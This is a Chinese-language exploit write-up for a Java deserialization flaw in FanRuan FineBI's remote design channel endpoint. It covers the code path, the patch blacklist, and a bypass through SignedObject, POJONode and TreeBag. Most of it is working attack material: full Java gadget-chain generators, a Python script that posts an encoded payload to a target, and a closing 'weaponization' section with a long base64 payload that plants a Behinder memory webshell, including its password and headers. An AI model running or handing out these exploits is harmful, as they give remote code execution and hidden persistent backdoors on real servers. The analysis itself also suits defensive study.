帆软channel接口反序列化漏洞分析

环境

fineBi 5.1.0

fineBi5.1.18（绕过）

漏洞分析

漏洞接口为/webroot/decision/remote/design/channel，在fine-decision-report-10.0.jar中，接口对应com.fr.decision.extension.report.api.remote.RemoteDesignResource类的onMessage方法。

在onMessage方法中，获取request中的输入流，以此作为参数调用WorkContext.handleMessage方法。

在com.fr.workspace.WorkContext的handleMessage方法中，调用了messageListener.handleMessage(var0)。

会调用到com.fr.workspace.engine.rpc.WorkspaceServerInvoker的handleMessage方法，在该方法中调用当前类的deserializeInvocation方法。

在deserializeInvocation方法中，调用了SerializerHelper.deserialize来对request输入流进行反序列化，传入两个参数，一个是输入流，一个是Serializer对象。

Serializer对象是通过以InvocationSerializer.getDefault()作为参数调用GZipSerializerWrapper.wrap方法获取。

InvocationSerializer.getDefault()方法是创建InvocationSerializer对象。

GZipSerializerWrapper.wrap方法是创建GZipSerializerWrapper对象，并且将InvocationSerializer对象作为this.serializer的值。

接着调用SerializerHelper.deserialize来对request输入流进行反序列化，这里的var1为GZipSerializerWrapper对象，将会调用GZipSerializerWrapper的deserialize方法。

在com.fr.serialization.GZipSerializerWrapper的deserialize方法中，会调用this.serializer的deserialize方法，这里的this.serializer为InvocationSerializer对象。

最终会调用com.fr.rpc.serialization.InvocationSerializer的deserialize方法，var1为request输入流，调用了readObject进行反序列化。

inputstream输入流在com.fr.serialization.GZipSerializerWrapper的deserialize方法中会被包装成GZIPInputStream对象，在发送数据的时候需要将inputstream进行GZIP编码。

利用链

在fine-bi-engine-third-5.1.jar包中集成了CB链依赖

生成利用链

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class CB_not_cc {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();

        Class<? extends TemplatesImpl> templatesClass = templates.getClass();
        Field name = templatesClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "aaa");

        Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // 自定义类
        ClassPool pool = ClassPool.getDefault();
        String clazzName = "onload";
        CtClass targetClass = pool.makeClass(clazzName);
        targetClass.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        CtConstructor cons = new CtConstructor(new CtClass[] {}, targetClass);

        cons.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        targetClass.addConstructor(cons);
        byte[] byteArray = targetClass.toBytecode();

        byte[][] payloads = {byteArray};
        bytecodes.set(templates, payloads);

        Field tfactory = templatesClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());


        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
        queue.add("a");
        queue.add("b");

        Class<? extends BeanComparator> beanComparatorClass = beanComparator.getClass();
        Field property = beanComparatorClass.getDeclaredField("property");
        property.setAccessible(true);
        property.set(beanComparator, "outputProperties");

        Class<? extends PriorityQueue> queueClass = queue.getClass();
        Field queue1 = queueClass.getDeclaredField("queue");
        queue1.setAccessible(true);
        queue1.set(queue, new Object[]{templates,templates});

        // 序列化
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(queue);
        
        // 包装成ZIP
        final ByteArrayOutputStream baos3 = new ByteArrayOutputStream();
        final GZIPOutputStream gos3 = new GZIPOutputStream(baos3);
        gos3.write(baos.toByteArray());
        gos3.finish();

        String base64str = Base64.getEncoder().encodeToString(baos3.toByteArray());
        System.out.println(base64str);

        // 执行反序列化
        final ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64str));
        final GZIPInputStream gis = new GZIPInputStream(bais);
        ObjectInputStream ois = new ObjectInputStream(gis);
        ois.readObject();
        
    }

}

通过py脚本利用

import requests,base64


host= "http://172.20.10.190:37799/"

payload = "H4sIAAAAAAAAAGWTT2sTQRjGn9lNkzRNaxtta70Jgm2FXcWDYMU/DQjBUKst9pBCmGyGuLKZXWdm261gD/0AnvwW9lIQFQ+CVw9614sXjx7EiyBW381G09pd2Jl5Zt73mfc3s7tfMaQVph/wDe7Exg+cZeWHyjdbd2IRi6cfzz//eW1nz4ZVQ077j0QdJS/sRlxxEyqDqXoa6aaRbvWfvpBEACxKfC5UHYdH3LsvHIrrhlI7LcFlGqCdReoNoj48YTv7S9+2LViHXB5iG6yOYqTCSCizZVDJXAMuO+6KUb7skCO5zffKSGUnk89UuRY1qYXUvvE3xMBs015/vL785b0FJJHBeBibKDbLmYUv9GaOKrAp52XaiKNj6RyoJOHk4fjSCCV54CQ6MJ5jFE+cVdGNAm6ErlE7vHb7rdx9dtFGvobRpi/bQpqluNsSqoaxJgVIHQhTIz1poNRsbRnhhW2hDexGY7GBfNMLuKZhpXGg4mqqLdQx1JS8K1I6uTommv9XcPhwBnp2OPhNT6x6Rrd+zUx2Op8u9VjQFCPdaizufp/+kS+ufu7LzHu3//oNTV/ADEM+lEHI2wUwhuuEyCVELiFyM0RuD5H7F5HbQ+SqWBq/K9wbLU3Fe2a1T6AAmzJe8aVvrjLYs3P3GHJVIkETZQwhX0IRwwwTAwh3s1QFjDCUOsL0xwyTs3P1I8sWyhjFWAllHKPMHg+8IiaoJxLhMZydPXqfDiYhdp4g5GUcx4k0ySR5roSx8sRNPyDPkQyGk4bgNCykl4eI0Uubp2+BRqdIZ9SOzb9E6RXGK5UXmFrb66+cTn8YnKSraHPOo02GJD3Z0eQPQVjlt6IDAAA="
data = base64.b64decode(payload)

res = requests.post(url=host+"/webroot/decision/remote/design/channel", data=data,verify=False, proxies={"http": "http:127.0.0.1:8080"})

print(res.text)

不过这里发现一个问题，当使用commons-beanutils 1.9.2 生成反序列化数据提交不会利用成功，通过arthas调试会发现报错java.io.InvalidClassException: org.apache.commons.beanutils.BeanComparator; local class incompatible: stream classdesc serialVersionUID = -2044202215314119608, local class serialVersionUID = -3490850999041592962，这是由于commons-beanutils版本跟帆软环境中的不一致造成的，将生成序列化数据的环境从1.9.2换到1.8.3即可。

修复方式

在5.1.18版本中，InputStream对象已被JDKSerializer.CustomObjectInputStream类重新封装。

重写了resolveClass方法，如果被序列化的类名在BLACK_SET变量中，则不会进行序列化。

从/com/fr/serialization/blacklist.txt中得到禁止类序列化的名单。

在fine-core-10.0.jar中的com.fr.serialization.blacklist.txt路径下

二次反序列化绕过限制

通过blacklist.txt黑名单可以看到，常规利用链都已经在黑名单中，那么真的就没有办法进行利用了吗？根据师傅们的高见，得知可以利用SignedObject 类进行反序列化绕过黑名单中的类名再次反序列化进行利用，俗称二次反序列化。

在java.security.SignedObject类中存在一个getObject方法，这个方法会this.content变量进行反序列化。

而SignedObject类的构造方法会将传入的object对象进行序列化，并赋值给this.content变量。

那么通过SignedObject这个类，可以将某个利用链，如CB链触发点PriorityQueue对象，作为参数传递进去，再找到一条路径调用getObject方法，便可以实现二次反序列化。

getObject属于getter方法，在fastjson中，对一个类进行序列化会自动调用该类的静态代码块、构造方法、getter方法。

但是在帆软环境中是没有fastjson依赖的，帆软中对json的处理是使用的jackson；在jackson中序列化一个类也有着类似的效果。

在com.fr.third.fasterxml.jackson.databind.node.InternalNodeMapper类中，nodeToString方法和nodeToPrettyString方法都调用了writeValueAsString对JsonNode进行序列化。

而在com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode的toString和toPrettyString方法中也对如上两个方法分别进行调用；this代表所传入进行序列化的对象是当前调用的对象，当BaseJsonNode对象和继承了BaseJsonNode的对象调用到toString方法，就会调用InternalNodeMapper.nodeToPrettyString(this)对当前调用的对象进行序列化，自动调用getter方法。

BaseJsonNode类被18个子类继承。

在这个18个子类中，只有POJONode类的构造方法能传入Object对象。

这里，我们将SignedObject对象作为参数，创建一个POJONode对象，并调用其toString方法，并在SignedObject的getObject中打上断点，运行便调用到了该方法。

调用栈

getObject:177, SignedObject (java.security)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
serializeAsField:690, BeanPropertyWriter (com.fr.third.fasterxml.jackson.databind.ser)
serializeFields:755, BeanSerializerBase (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fr.third.fasterxml.jackson.databind.ser)
defaultSerializeValue:1119, SerializerProvider (com.fr.third.fasterxml.jackson.databind)
serialize:115, POJONode (com.fr.third.fasterxml.jackson.databind.node)
serialize:39, SerializableSerializer (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:20, SerializableSerializer (com.fr.third.fasterxml.jackson.databind.ser.std)
_serialize:481, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serializeValue:320, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serialize:1517, ObjectWriter$Prefetch (com.fr.third.fasterxml.jackson.databind)
_writeValueAndClose:1218, ObjectWriter (com.fr.third.fasterxml.jackson.databind)
writeValueAsString:1087, ObjectWriter (com.fr.third.fasterxml.jackson.databind)
nodeToString:30, InternalNodeMapper (com.fr.third.fasterxml.jackson.databind.node)
toString:136, BaseJsonNode (com.fr.third.fasterxml.jackson.databind.node)
main:84, Test (example)

将SignedObject封装在POJONode类中，调用其toString方法，便触发了SignedObject的getObject方法。为了在执行反序列化readObject中调用到POJONode的toString方法，接下来还需要找到一条直接或间接的点能够触发POJONode的toString方法的点。

在javax.management.BadAttributeValueExpException的readObject方法中，调用了toString方法。

并且this.val可通过构造方法进行传递。

将POJONode对象封装在BadAttributeValueExpException中，可直接进行触发。

但是不幸的是，该链在某个版本已经遭遇黑名单的残害了；不过还存在一个点，在org.apache.commons.collections.bag.TreeBag的readObject方法中，创建了TreeMap对象传入，调用了父类的doReadObject方法。

doReadObject方法调用了TreeMap的put方法

TreeMap的put方法中调用了compare对key值进行比较，这里的comparator对象可以在创建TreeBag对象时传入，那么可以在创建TreeBag对象时，通过传入指定comparator对象，执行反序列化时就会自动调用comparator对象的compare方法。

那么在org.freehep.util.VersionComparator的compare方法中，调用了toString方法。

不过VersionComparator这个类并没有继承Serializable反序列化接口，不能进行序列化。

到这儿就完了吗？并没有，有时候不得不佩服师傅们的智慧。在com.fr.base.ClassComparator这个类中，可指定类名创建ClassComparator对象，在执行compare方法时，会反射加载指定的类名，并调用其compare方法，关键的是继承了Serializable接口。

所以这里选择将VersionComparator类的包名org.freehep.util.VersionComparator作为参数创建ClassComparator对象，最后再将ClassComparator对象作为创建TreeBag对象的参数，执行反序列化时，就会调用到ClassComparator的compare方法。

调用链

最终的调用链如下。

org.apache.commons.collections.bag.TreeBag#readObject
	java.util.TreeMap#put
		java.util.TreeMap#compare
			com.fr.base.ClassComparator#compare
				org.freehep.util.VersionComparator#compare
					com.fr.third.fasterxml.jackson.databind.node.POJONode#toString
						java.security.SignedObject#getObject
							// 二次反序列化利用CB链

坑点

在构造利用链的时候遇到的一些问题。

add添加POJONode对象坑点

在序列化TreeBag类的时候，需要add添加被触发的POJONode对象，但是执行add会提前触发漏洞执行，为了防止提前触发漏洞，需要先add一个无关紧要的对象，然后再通过反射修改数据为POJONode对象。

final Class<?> superclass = treeBag.getClass().getSuperclass();
final Field map = superclass.getDeclaredField("map");
map.setAccessible(true);
final Map treeMap = (Map) map.get(treeBag);
final Field root = treeMap.getClass().getDeclaredField("root");
root.setAccessible(true);
final Map.Entry  mapEnter = (Map.Entry) root.get(treeMap);
final Class<? extends Map.Entry> aClass = mapEnter.getClass();
final Field key = aClass.getDeclaredField("key");
key.setAccessible(true);
key.set(mapEnter, node);

执行writeObject会自动触发调用

当按照调用链，把整条链子构造出来，执行writeObject序列化的时候，会提前触发调用，并且会报错，导致序列化后的数据不能正常生成。

报错提示

解决办法是将com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode类反射加载，获取到writeReplace方法，移除掉，即可正常生成。

final CtClass ctClass = ClassPool.getDefault().get("com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode");
final CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
ctClass.removeMethod(writeReplace);
ctClass.toClass();

生成exp

package example;


import com.fr.base.ClassComparator;
import com.fr.third.fasterxml.jackson.databind.node.POJONode ;
import javassist.CtMethod;
import org.apache.commons.collections.bag.TreeBag;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
import java.util.zip.GZIPOutputStream;

public class Test {
    public static void main(String[] args) throws Exception{

        TemplatesImpl templates = new TemplatesImpl();

        Class<? extends TemplatesImpl> templatesClass = templates.getClass();
        Field name = templatesClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "aaa");

        Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // 自定义类
        ClassPool pool = ClassPool.getDefault();
        String clazzName = "onload";
        CtClass targetClass = pool.makeClass(clazzName);
        targetClass.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        CtConstructor cons = new CtConstructor(new CtClass[] {}, targetClass);

        cons.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        targetClass.addConstructor(cons);
        byte[] byteArray = targetClass.toBytecode();

        byte[][] payloads = {byteArray};
        bytecodes.set(templates, payloads);

        Field tfactory = templatesClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());


        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
        queue.add("a");
        queue.add("b");

        Class<? extends BeanComparator> beanComparatorClass = beanComparator.getClass();
        Field property = beanComparatorClass.getDeclaredField("property");
        property.setAccessible(true);
        property.set(beanComparator, "outputProperties");

        Class<? extends PriorityQueue> queueClass = queue.getClass();
        Field queue1 = queueClass.getDeclaredField("queue");
        queue1.setAccessible(true);
        queue1.set(queue, new Object[]{templates,templates});

        final CtClass ctClass = ClassPool.getDefault().get("com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode");
        final CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
        ctClass.removeMethod(writeReplace);
        ctClass.toClass();


        // 二次反序列化
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair kp = kpg.generateKeyPair();
        final SignedObject dsa = new SignedObject(queue, kp.getPrivate(), Signature.getInstance("DSA"));

//        dsa.getObject();
        POJONode node = new POJONode(dsa);

//        final VersionComparator versionComparator = new VersionComparator();
//        versionComparator.compare(node, node);


        final ClassComparator classComparator = new ClassComparator("org.freehep.util.VersionComparator");
//        classComparator.compare(node, node);
        final TreeBag treeBag = new TreeBag(classComparator);
        treeBag.add(-1);

        // 反射修改 root 属性的key
        final Class<?> superclass = treeBag.getClass().getSuperclass();
        final Field map = superclass.getDeclaredField("map");
        map.setAccessible(true);
        final Map treeMap = (Map) map.get(treeBag);
        final Field root = treeMap.getClass().getDeclaredField("root");
        root.setAccessible(true);
        final Map.Entry  mapEnter = (Map.Entry) root.get(treeMap);
        final Class<? extends Map.Entry> aClass = mapEnter.getClass();
        final Field key = aClass.getDeclaredField("key");
        key.setAccessible(true);
        key.set(mapEnter, node);



        //  序列化
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(treeBag);


        final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        final GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);
        gzipOutputStream.write(baos.toByteArray());
        gzipOutputStream.finish();

        final String encodeToString = Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray());
        System.out.println(encodeToString);


//        // 执行反序列化
        final ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(bais);
        ois.readObject();


    }
}

武器化：打内存马

帆软 5.1.0 打冰蝎内存马

密码: Oknfbivaa
地址: /webroot/decision/login
请求头: Referer: Reudjmcj
脚本类型: JSP
内存马类名: org.apache.commons.lang.AbstractMatcherSjpListener
注入器类名: ch.qos.logbacke.StringUtil

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